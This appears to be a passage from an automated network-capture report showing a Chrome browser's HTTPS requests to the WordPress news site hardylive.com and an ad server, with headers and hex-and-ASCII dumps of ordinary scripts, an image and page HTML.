                                                        Data Ascii: !function(e){var t;"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):("undefined"!=typeof window?t=window:"undefined"!=typeof global?t=global:"undefined"!=typeof self&&(t=self),t.sbj
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 65 2e 62 6f 64 79 29 2c 72 3d 62 28 6e 29 2c 72 3d 65 3f 5b 72 5d 2e 63 6f 6e 63 61 74 28 72 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 7c 7c 5b 5d 2c 43 28 6e 29 3f 6e 3a 5b 5d 29 3a 6e 2c 6e 3d 74 2e 63 6f 6e 63 61 74 28 72 29 3b 72 65 74 75 72 6e 20 65 3f 6e 3a 6e 2e 63 6f 6e 63 61 74 28 4c 28 44 28 72 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 76 28 65 29 26 26 22 66 69 78 65 64 22 21 3d 3d 54 28 65 29 2e 70 6f 73 69 74 69 6f 6e 3f 65 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 62 28 65 29 2c 72 3d 61 28 65 29 3b 72 26 26 28 74 3d 72 2c 30 3c 3d 5b 22 74 61 62 6c 65 22 2c 22 74 64 22 2c 22 74 68 22 5d 2e 69 6e 64 65 78 4f 66 28
                                                        Data Ascii: e.body),r=b(n),r=e?[r].concat(r.visualViewport||[],C(n)?n:[]):n,n=t.concat(r);return e?n:n.concat(L(D(r)))}function a(e){return v(e)&&"fixed"!==T(e).position?e.offsetParent:null}function S(e){for(var t,n=b(e),r=a(e);r&&(t=r,0<=["table","td","th"].indexOf(
                                                        2025-03-11 18:02:50 UTC16384INData Raw: 65 72 65 6e 63 65 2c 72 3d 74 2e 72 65 63 74 73 2e 70 6f 70 70 65 72 2c 69 3d 74 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 2e 70 72 65 76 65 6e 74 4f 76 65 72 66 6c 6f 77 2c 6f 3d 7a 28 74 2c 7b 65 6c 65 6d 65 6e 74 43 6f 6e 74 65 78 74 3a 22 72 65 66 65 72 65 6e 63 65 22 7d 29 2c 61 3d 7a 28 74 2c 7b 61 6c 74 42 6f 75 6e 64 61 72 79 3a 21 30 7d 29 2c 6f 3d 6c 65 28 6f 2c 6e 29 2c 6e 3d 6c 65 28 61 2c 72 2c 69 29 2c 61 3d 66 65 28 6f 29 2c 72 3d 66 65 28 6e 29 3b 74 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 5b 65 5d 3d 7b 72 65 66 65 72 65 6e 63 65 43 6c 69 70 70 69 6e 67 4f 66 66 73 65 74 73 3a 6f 2c 70 6f 70 70 65 72 45 73 63 61 70 65 4f 66 66 73 65 74 73 3a 6e 2c 69 73 52 65 66 65 72 65 6e 63 65 48 69 64 64 65 6e 3a 61 2c 68 61 73 50 6f 70 70 65 72 45
                                                        Data Ascii: erence,r=t.rects.popper,i=t.modifiersData.preventOverflow,o=z(t,{elementContext:"reference"}),a=z(t,{altBoundary:!0}),o=le(o,n),n=le(a,r,i),a=fe(o),r=fe(n);t.modifiersData[e]={referenceClippingOffsets:o,popperEscapeOffsets:n,isReferenceHidden:a,hasPopperE
                                                        2025-03-11 18:02:50 UTC14995INData Raw: 6d 65 6e 74 43 68 69 6c 64 29 2c 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 6e 69 6d 61 74 65 66 69 6c 6c 22 2c 22 22 29 2c 6e 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 65 2e 73 65 74 50 72 6f 70 73 28 7b 61 72 72 6f 77 3a 21 31 2c 61 6e 69 6d 61 74 69 6f 6e 3a 22 73 68 69 66 74 2d 61 77 61 79 22 7d 29 29 7d 2c 6f 6e 4d 6f 75 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3b 69 26 26 28 65 3d 6e 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 2c 74 3d 4e 75 6d 62 65 72 28 65 2e 72 65 70 6c 61 63 65 28 22 6d 73 22 2c 22 22 29 29 2c 72 2e 73 74 79 6c 65 2e 74 72 61 6e 73 69 74 69 6f 6e 44 65 6c 61 79 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2f 31 30 29 2b 22 6d
                                                        Data Ascii: mentChild),n.setAttribute("data-animatefill",""),n.style.overflow="hidden",e.setProps({arrow:!1,animation:"shift-away"}))},onMount:function(){var e,t;i&&(e=n.style.transitionDuration,t=Number(e.replace("ms","")),r.style.transitionDelay=Math.round(t/10)+"m


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44977445.77.88.114435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:49 UTC610OUTGET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank HTTP/1.1
                                                        Host: g.adspeed.net
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:51 UTC349INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:50 GMT
                                                        Content-Type: application/x-javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                        Pragma: no-cache
                                                        Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:02:51 UTC277INData Raw: 31 30 39 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 27 2b 27 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 64 73 70 65 65 64 2e 6e 65 74 2f 61 64 2e 70 68 70 3f 64 6f 3d 6a 73 26 7a 69 64 3d 31 31 37 30 37 38 26 6f 69 64 3d 32 37 30 36 34 26 77 64 3d 2d 31 26 68 74 3d 2d 31 26 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 26 63 62 3d 27 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 27 26 72 65 66 3d 27 2b 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2e 73 75 62 73 74 72 28 30 2c 32 35 35 29 29 2b 27 26 75 72 69 3d 27 2b 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 2e 73 75 62 73 74 72 28 30 2c 32 35 35 29 29 2b 27 22 3e
                                                        Data Ascii: 109document.write('<scr'+'ipt type="text/javascript" src="https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb='+Math.random()+'&ref='+escape(document.referrer.substr(0,255))+'&uri='+escape(document.URL.substr(0,255))+'">


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.449776198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:52 UTC598OUTGET /wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.26.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:54 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:52 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 7910
                                                        Connection: close
                                                        Last-Modified: Fri, 14 Jun 2024 14:45:57 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:54 UTC7910INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 61 64 76 61 64 73 5f 70 72 6f 63 66 70 22 2c 61 3d 22 61 64 76 61 6e 63 65 64 5f 61 64 73 5f 61 64 5f 63 6c 69 63 6b 73 22 2c 64 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 65 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 61 64 76 61 64 73 2d 70 61 73 73 69 76 65 2d 63 62 2d 63 6f 6e 64 69 74 69 6f 6e 73 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 2e 63 6f 6e 64 69 74 69 6f 6e 73 2e 61 64 5f 63 6c 69 63 6b 73 3d 22 63 68 65 63 6b 5f 61 64 5f 63 6c 69 63 6b 73 22 2c 74 2e 63 68 65 63 6b 5f 61 64 5f 63 6c 69 63 6b
                                                        Data Ascii: !function(e){var t="advads_procfp",a="advanced_ads_ad_clicks",d=null,n=null;function o(e){try{return JSON.parse(e)}catch(e){return null}}e(document).on("advads-passive-cb-conditions",(function(e,t){t.conditions.ad_clicks="check_ad_clicks",t.check_ad_click


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.449777198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:53 UTC425OUTGET /wp-content/themes/jnews/assets/img/jeg-empty.png HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:54 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:52 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 70
                                                        Connection: close
                                                        Last-Modified: Thu, 18 Jul 2024 15:35:14 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:54 UTC70INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 06 00 00 00 1f 15 c4 89 00 00 00 0d 49 44 41 54 08 99 63 f8 ff ff 3f 03 00 08 fc 02 fe 85 cd ab 34 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRIDATc?4IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.449778198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:54 UTC562OUTGET /wp-includes/js/hoverIntent.min.js?ver=1.10.2 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:54 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:53 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 1499
                                                        Connection: close
                                                        Last-Modified: Mon, 10 Jun 2024 12:48:07 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:54 UTC1499INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 6a 51 75 65 72 79 26 26 21 6a 51 75 65 72 79 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74 26 26 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 22 75 73 65
                                                        Data Ascii: /*! This file is auto-generated */!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(f){"use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.449782198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:55 UTC719OUTGET /category/eprint/ HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:56 UTC333INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/", <https://hardylive.com/wp-json/wp/v2/categories/43>; rel="alternate"; title="JSON"; type="application/json"
                                                        2025-03-11 18:02:56 UTC16051INData Raw: 37 66 66 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                        Data Ascii: 7ffa<!doctype html>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->...[i
                                                        2025-03-11 18:02:56 UTC16384INData Raw: 73 70 61 63 69 6e 67 2d 2d 37 30 3a 20 33 2e 33 38 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73
                                                        Data Ascii: spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--s
                                                        2025-03-11 18:02:57 UTC16384INData Raw: 5f 6d 65 6e 75 20 6c 69 20 3e 20 75 6c 20 6c 69 2e 73 66 48 6f 76 65 72 20 3e 20 2e 73 66 2d 77 69 74 68 2d 75 6c 3a 61 66 74 65 72 2c 20 2e 6a 65 67 5f 68 65 61 64 65 72 20 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 77 72 61 70 70 65 72 20 2e 6a 65 67 5f 6d 65 6e 75 20 6c 69 20 3e 20 75 6c 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 3e 20 2e 73 66 2d 77 69 74 68 2d 75 6c 3a 61 66 74 65 72 2c 20 2e 6a 65 67 5f 68 65 61 64 65 72 20 2e 6a 65 67 5f 6e 61 76 62 61 72 5f 77 72 61 70 70 65 72 20 2e 6a 65 67 5f 6d 65 6e 75 20 6c 69 20 3e 20 75 6c 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 61 6e 63 65 73 74 6f 72 20 3e 20 2e 73 66 2d 77 69 74 68 2d 75 6c 3a 61 66 74 65 72 20 7b 20 63 6f 6c 6f 72 20 3a 20 23 66 66 66 66 66 66 3b 20 7d 20 2e
                                                        Data Ascii: _menu li > ul li.sfHover > .sf-with-ul:after, .jeg_header .jeg_navbar_wrapper .jeg_menu li > ul li.current-menu-item > .sf-with-ul:after, .jeg_header .jeg_navbar_wrapper .jeg_menu li > ul li.current-menu-ancestor > .sf-with-ul:after { color : #ffffff; } .
                                                        2025-03-11 18:02:57 UTC16384INData Raw: 3d 22 66 61 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 3c 2f 61 3e 0a 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 68 61 72 64 79 6c 69 76 65 2e 63 6f 6d 2f 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 6a 65 67 5f 73 65 61 72 63 68 5f 66 6f 72 6d 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 0a 20 20 20 20 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 73 22 20 63 6c 61 73 73 3d 22 6a 65 67 5f 73 65 61 72 63 68 5f 69 6e 70 75 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 3e 0a 09 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 20 42
                                                        Data Ascii: ="fa fa-search"></i></a><form action="https://hardylive.com/" method="get" class="jeg_search_form" target="_top"> <input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off"><button aria-label="Search B
                                                        2025-03-11 18:02:57 UTC16384INData Raw: 2d 30 30 30 31 2d 37 35 30 78 35 33 36 2e 6a 70 67 20 37 35 30 77 2c 20 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 73 74 61 74 65 6c 65 73 73 2d 6d 6f 75 6e 74 61 69 6e 6d 65 64 69 61 6e 65 77 73 2d 63 6f 2f 73 69 74 65 73 2f 33 35 2f 32 30 32 35 2f 30 32 2f 66 75 6c 6c 2d 73 65 63 74 69 6f 6e 2d 32 2d 35 2d 32 35 2d 31 5f 70 61 67 65 2d 30 30 30 31 2d 31 31 34 30 78 38 31 35 2e 6a 70 67 20 31 31 34 30 77 22 20 64 61 74 61 2d 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 65 78 70 61 6e 64 3d 22 37 30 30 22 20 64 61 74 61 2d 69 6d 61 67 65 2d 73 69 7a 65 3d 22 6a 6e 65 77 73 2d 33 35 30 78 32 35 30 22 20 64 61 74 61 2d 73 74 61 74 65 6c 65 73 73 2d 6d 65 64 69 61 2d 62 75 63 6b 65 74 3d 22 73 74 61
                                                        Data Ascii: -0001-750x536.jpg 750w, https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/full-section-2-5-25-1_page-0001-1140x815.jpg 1140w" data-sizes="auto" data-expand="700" data-image-size="jnews-350x250" data-stateless-media-bucket="sta
                                                        2025-03-11 18:02:57 UTC16384INData Raw: 74 65 67 6f 72 79 2d 65 70 72 69 6e 74 22 3e 65 50 72 69 6e 74 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 67 5f 70 6f 73 74 62 6c 6f 63 6b 5f 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6a 65 67 5f 70 6f 73 74 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 61 72 64 79 6c 69 76 65 2e 63
                                                        Data Ascii: tegory-eprint">ePrint</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://hardylive.c
                                                        2025-03-11 18:02:57 UTC16384INData Raw: 66 6f 6e 74 73 2f 6c 72 6d 2d 66 61 34 2d 69 63 6f 6d 6f 6f 6e 2e 65 6f 74 3f 69 38 6e 62 73 76 27 29 3b 0d 0a 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 68 61 72 64 79 6c 69 76 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6a 61 78 2d 6c 6f 67 69 6e 2d 61 6e 64 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 70 6f 70 75 70 2f 61 73 73 65 74 73 2f 6c 72 6d 2d 66 61 34 2f 66 6f 6e 74 73 2f 6c 72 6d 2d 66 61 34 2d 69 63 6f 6d 6f 6f 6e 2e 65 6f 74 3f 69 38 6e 62 73 76 23 69 65 66 69 78 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0d 0a 20 20 20 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 68 61 72 64 79 6c 69 76 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e
                                                        Data Ascii: fonts/lrm-fa4-icomoon.eot?i8nbsv'); src: url('https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-fa4/fonts/lrm-fa4-icomoon.eot?i8nbsv#iefix') format('embedded-opentype'), url('https://hardylive.com/wp-con
                                                        2025-03-11 18:02:57 UTC11383INData Raw: 64 20 50 61 73 73 77 6f 72 64 22 2c 22 70 61 73 73 77 6f 72 64 73 5f 69 73 5f 6d 69 73 6d 61 74 63 68 22 3a 22 50 61 73 73 77 6f 72 64 73 20 69 73 20 6d 69 73 6d 61 74 63 68 21 22 2c 22 70 61 73 73 77 6f 72 64 73 5f 69 73 5f 77 65 61 6b 22 3a 22 45 72 72 6f 72 3a 20 59 6f 75 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 76 65 72 79 20 77 65 61 6b 21 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 61 72 64 79 6c 69 76 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6a 61 78 2d 6c 6f 67 69 6e 2d 61 6e 64 2d 72 65 67 69 73 74 72 61 74 69 6f 6e 2d 6d 6f 64 61 6c 2d 70 6f 70
                                                        Data Ascii: d Password","passwords_is_mismatch":"Passwords is mismatch!","passwords_is_weak":"Error: Your password is very weak!"}};/* ... */</script><script type="text/javascript" src="https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-pop


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.449781198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:55 UTC562OUTGET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
